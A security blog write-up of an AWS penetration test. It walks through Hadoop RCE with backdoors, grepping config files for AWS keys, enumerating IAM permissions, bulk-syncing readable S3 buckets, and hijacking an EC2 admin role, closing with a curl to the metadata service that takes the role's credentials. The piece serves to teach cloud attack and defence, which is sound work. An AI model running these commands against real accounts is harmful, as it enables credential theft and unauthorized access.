Jimm Wayans

Part 1 – AWS Security

Introduction: In this real-world case study, we examine the enumeration and strategic use of AWS IAM permissions. I strongly recommend reading my earlier article on the intricacies of IAM permissions first, despite its length, as it is a prerequisite for following the tactics employed here. To keep the focus on the more intricate parts of the exploitation, we will not dwell on the simpler vulnerabilities we encountered (some of which have been covered in a separate writeup).

Throughout this study, we will walk through the manual process of enumerating IAM policies and roles, look at automated tools designed for the purpose, and stress why automation should never be trusted blindly. We will also include a brief tutorial on using “jq.”

Initiating Network Access: My initial point of entry into the network was discovered through a Nessus scan of a publicly accessible AWS endpoint. This scan revealed the presence of an exposed, unauthenticated ResourceManager service within a Hadoop instance. If you recall, this vulnerability was previously discussed in my writeup on Hadoop and MCollective exploitation, and it can be readily exploited using Metasploit to achieve Remote Code Execution (RCE).

Having successfully compromised this instance and swiftly establishing a couple of backdoors to ensure continued access, I commenced network scanning. Eventually, I identified a master Hadoop node with a service exposed on port 9298, accessible via an internal interface within the subnet.

I confirmed that it hosted configuration files for Hadoop and proceeded to download all the files for analysis. In AWS environments, one of the most valuable discoveries you can make is AWS access keys and secret keys, which can be located using the regular expressions provided here: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10

AWS provides three methods for accessing resources:

  1. Through the web console
  2. Through the command line interface (CLI)
  3. Through APIs

To use the CLI, you require an access key, a secret key, and optionally a token. Access keys and secret keys can be identified using the following regular expressions:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' *
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' *
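As a quick sanity check, the two patterns can be exercised against a scratch file seeded with the example key pair from AWS’s own documentation. The file name and layout below loosely mimic a Hadoop core-site.xml and are made up for the demo:

```shell
# Seed a scratch file with AWS's documented example credentials
# (not real keys; the layout loosely mimics a Hadoop core-site.xml).
mkdir -p /tmp/keyhunt && cd /tmp/keyhunt
printf '<name>fs.s3a.access.key</name><value>AKIAIOSFODNN7EXAMPLE</value>\n' > core-site.xml
printf '<name>fs.s3a.secret.key</name><value>wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</value>\n' >> core-site.xml

# 20-char uppercase/digit run -> access key IDs
grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' .
# 40-char base64-ish run -> secret keys
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' .
```

Each grep prints exactly one matching line here; the negative lookarounds stop the patterns from firing inside longer runs of the same character class.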

After obtaining all the necessary files, I conducted a search and located a match in a file called “core-site.xml.”

Next, I employed the tool “enumerate-iam.py” to perform a brute-force analysis of the permissions available to that account.


I observed that the account had the ability to list S3 buckets but did not appear to possess admin privileges. To conduct a quick privilege escalation check, I used RhinoSecurityLab’s “aws_escalate.py,” a tool I previously mentioned in my article on IAM permissions.


Unfortunately, it appeared that the account did not even have “GetUser” privileges. However, there were still other avenues to explore. Let’s return to the S3 route.

Pivoting for Access: We needed to configure a profile with the obtained credentials and initiate enumeration.

aws configure --profile test
aws --profile test s3 ls

There were approximately 180 buckets. We began reading them with:

aws --profile test s3 ls s3://backup-db-logs


This also presented a challenge as it turned out that the account had permissions to list the buckets but not to read them. To identify buckets that we could read, various tools were available, but we preferred to create our own scripts for better control over the process:

#!/bin/bash
# enumerateReadBuckets.sh -- list the S3 buckets a profile can actually read

# Grab the profile name from the --profile argument.
while [[ $# -gt 0 ]]; do
  if [[ "$1" == "--profile" ]]; then
    profile="$2"
  fi
  shift
done

echo "Enumerating the buckets..."
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets

echo "You can read the following buckets:"
> /tmp/readBuckets
while read -r bucket; do
  # A bucket counts as readable if listing its top level returns anything.
  result=$(aws --profile "$profile" s3 ls "s3://$bucket" 2>/dev/null | head -n 1)
  if [[ -n "$result" ]]; then
    echo "$bucket" | tee -a /tmp/readBuckets
  fi
done < /tmp/buckets


Invoke the script using:

bash enumerateReadBuckets.sh --profile test


We only had access to four buckets, which was a modest result. Let’s begin syncing all the information for local analysis.

for i in $(bash enumerateReadBuckets.sh --profile test | tail -n +1); do aws s3 sync s3://"$i" .; done


However, our script did not return as expected. While we weren’t certain about the issue at that moment, this situation is not uncommon during penetration testing, so we proceeded with manual enumeration.

We started with our first bucket, which we’ll refer to as “bucket1.”

aws --profile test s3 ls s3://bucket1

We found a “conf” directory, which seemed promising.

aws --profile test s3 ls s3://bucket1/conf/

Wait, wasn’t “core-site.xml” the first file we discovered? Let’s download it and search for credentials.

aws --profile test s3 cp s3://bucket1/conf/hadoop/core-site.xml .

Excellent! We found new credentials. Let’s create a new profile to use them.

aws configure --profile test2


Now, let’s perform a brute-force analysis of our permissions:

./aws_escalate.py --access-key-id AKID --secret-key SK

This new account appears to have significantly more permissions than our initial one. Let’s attempt to add a new user:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER


Unfortunately, we still did not obtain an admin account, but manual avenues for escalation remained.


Now, this is where our reasonably proficient knowledge of the AWS CLI becomes advantageous. The “aws_escalate” script relies on the “GetUser” operation to retrieve information about the current user. However, the “test2” account lacks the necessary “GetUser” permissions. Fortunately, there are alternative methods for obtaining information about the user you’re operating under. One such method involves using the Security Token Service API:

aws sts get-caller-identity

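Since get-caller-identity is our only window into who we are, the user name that aws_escalate wants can be pulled straight out of the returned ARN. A small sketch, run here against canned output (the account ID and names are placeholders):

```shell
# Canned get-caller-identity response; the IDs are placeholders.
identity='{"UserId":"AIDAEXAMPLEID","Account":"123456789012","Arn":"arn:aws:iam::123456789012:user/test2"}'

# The user name is the final path component of the Arn field.
echo "$identity" | jq -r '.Arn' | awk -F/ '{print $NF}'   # prints: test2
```

Against the live profile, the equivalent one-liner would be `aws --profile test2 sts get-caller-identity --query Arn --output text | awk -F/ '{print $NF}'`.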

Now that we’ve identified the user, we can specify it manually:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER


The script might indicate that no methods are possible due to the user’s lack of permissions to execute the methods it uses. However, we were able to manually escalate privileges with this user. Let’s explore how.

Next, we need to find the ideal role to impersonate. If you recall the permissions associated with our “test2” user, many of them were related to EC2. Referring back to Rhino’s excellent blog post, we can see that method 3 actually involves using EC2:

Description: An attacker with the iam:PassRole and ec2:RunInstances permissions can create a new EC2 instance and assign an existing EC2 instance profile/service role to it. They can then log in to the instance and retrieve the associated AWS keys from the EC2 instance metadata, granting access to all the permissions associated with the assigned instance profile/service role.

Before we proceed, it’s essential to clarify that while a script is an efficient way to enumerate information, it usually cannot guarantee with 100% certainty whether privilege escalation is possible. This is because:

  1. Most privilege escalations depend on multiple factors, not all of which are straightforward to correlate.
  2. Amazon’s permissions are highly granular, meaning you might have permissions for certain actions (e.g., listing buckets) but not for others (e.g., reading the contents of those buckets).

Consider the method mentioned above. Having PassRole and RunInstances privileges alone isn’t sufficient. You also need to identify which role to impersonate and establish a connection with the instance, which might require pre-existing SSH keys or other methods. Additionally, it depends on the instance’s security group configurations. Enumerating security groups is essential to determine which one to assign to the instance or if you have privileges to create new ones.
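Those checks map onto a handful of plain EC2 and IAM calls. Here is a sketch of that pre-flight enumeration, wrapped in a shell function so nothing runs against a live account; the profile name follows the earlier examples:

```shell
# Pre-flight enumeration before attempting the PassRole/RunInstances route.
# Wrapped in a function; nothing executes against AWS when this is sourced.
preflight_checks() {
  # Existing security groups and their inbound rules (can we reach SSH?).
  aws --profile test2 ec2 describe-security-groups

  # Key pairs we could name in run-instances -- we would still need the
  # matching private key to actually log in.
  aws --profile test2 ec2 describe-key-pairs

  # Instance profiles that could be passed to a new instance.
  aws --profile test2 iam list-instance-profiles
}
```

Any one of these calls failing with AccessDenied is a factor the escalation script cannot foresee, which is exactly the point made above.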

However, granular permissions offer more opportunities than initially apparent, as we’ll explore further.

Now, the first step is to find a role suitable for hijacking. Let’s check if we can enumerate roles using:

aws --profile PROFILE iam list-roles | head -n 10


Great! We have list-roles privileges. Now, there are two criteria we need for identifying a suitable role for hijacking:

  1. The role should have an Administrator policy or a similar highly privileged policy attached.
  2. The role’s trust policy should include Amazon’s EC2 service to allow instances to assume the role.

For the first criterion, we can list the associated managed policies with:

aws --profile PROFILE iam list-attached-role-policies --role-name ROLE

We can also list the inline policies with:

aws --profile PROFILE iam list-role-policies --role-name ROLE

Let’s attempt this with the “Administrators” role as an example:

aws --profile PROFILE iam list-attached-role-policies --role-name Administrators

Great! Now, let’s try to retrieve the trust relationship document (the assume role policy) to see which entities can assume this role. We can do this with:

aws --profile PROFILE iam get-role --role-name ROLE

This command should provide the output containing trust relationship information if your account has the necessary permissions. However, in the case of the “test2” account, this information isn’t accessible.


But remember what we discussed about granular permissions? There are often multiple ways to obtain the same information. In this case, the user didn’t have permission to use get-role, but it did have permission to use list-roles. Amazon’s documentation states that this call lists roles with a specified path prefix and returns an empty list if none are found, which can be misleading. The --path-prefix parameter is optional and defaults to a slash (“/”), so omitting it returns every role, replacing get-role for our specific use case. Anyway, let’s give it a try:

aws --profile PROFILE iam list-roles


Great! Now, we need a way to list the roles whose assume role policy includes Amazon’s EC2 service as a trustee. To filter these roles, we’ll use jq, a tool for parsing JSON output. To explain how to use it, let’s break it down step by step. First, let’s examine the structure we need to parse in a single role from the output.

The information we need is listed under “Principal,” and it should look something like:

"Principal": {
    "Service": "ec2.amazonaws.com"
}

Let’s select only the fields we’re interested in with:

aws --profile test2 iam list-roles | jq -r '.Roles[] | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

This command will filter for the RoleName and the Principal Service.


However, the output may not match the example we provided earlier, because not all results look exactly the same. Some involve a different Principal, such as a Federated one. This complexity makes parsing the output a bit harder, but not impossible. Let’s filter only the elements where “Principal.Service” is not null:

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

We’re getting closer. Now, let’s refine the results:

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 "ec2.amazonaws.com" | grep -v "ec2.amazonaws.com" | sort -u

This command will retrieve all the results where “Principal.Service” is present, along with the Role Name. It will then remove the unnecessary “ec2.amazonaws.com” entries and sort and remove duplicates.

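The whole pipeline can be dry-run offline against a tiny canned sample before pointing it at the real API. The role names and account ID below are invented:

```shell
# Two sample roles: one trusted by EC2, one federated via SAML.
cat > /tmp/roles.json <<'EOF'
{"Roles":[
  {"RoleName":"danger-role",
   "AssumeRolePolicyDocument":{"Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}},
  {"RoleName":"saml-role",
   "AssumeRolePolicyDocument":{"Statement":[{"Effect":"Allow","Principal":{"Federated":"arn:aws:iam::123456789012:saml-provider/idp"},"Action":"sts:AssumeRoleWithSAML"}]}}
]}
EOF

# Same filter as above, fed from the file instead of the live API;
# only the EC2-trusted role name survives.  Prints: danger-role
jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' /tmp/roles.json \
  | grep -B 1 "ec2.amazonaws.com" | grep -v "ec2.amazonaws.com" | sort -u
```

The federated role is dropped by the select() step because its Principal has no Service key, which is exactly the situation the null check handles.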

Now, we have identified potential candidates for instance role hijacking. The next step is to get the associated policies for each candidate using list-attached-role-policies and list-role-policies, as mentioned earlier. After a few minutes, we find a role with an Administrator policy attached. For the sake of illustration, let’s call it “danger-role.” It’s quite evocative and reminds me of “danger-zone,” which I appreciate as an Archer fan.

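For completeness, here is roughly what Rhino’s method 3 looks like against a role such as “danger-role.” Every ID is a placeholder, the instance profile is assumed to share the role’s name (list-instance-profiles would confirm that), and the commands are wrapped in a function so nothing executes here; this is a sketch, not the exact commands from the engagement.

```shell
# Sketch of the PassRole + RunInstances escalation; all IDs are placeholders
# and the function is never actually called here.
hijack_instance_role() {
  # Launch an instance with the privileged instance profile attached
  # (assumes an instance profile named like the role exists).
  aws --profile test2 ec2 run-instances \
      --image-id ami-00000000000000000 \
      --instance-type t2.micro \
      --key-name some-existing-keypair \
      --security-group-ids sg-00000000 \
      --iam-instance-profile Name=danger-role

  # From a shell on the new instance, the role's temporary credentials sit
  # in the instance metadata service.
  curl http://169.254.169.254/latest/meta-data/iam/security-credentials/danger-role
}
```

Note how the earlier caveats all show up as required inputs: a key pair, a reachable security group, and a passable instance profile.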

 #aws #awssecurity #webappsecurity #cloudsecurity

End of part 1, part 2 coming soon…
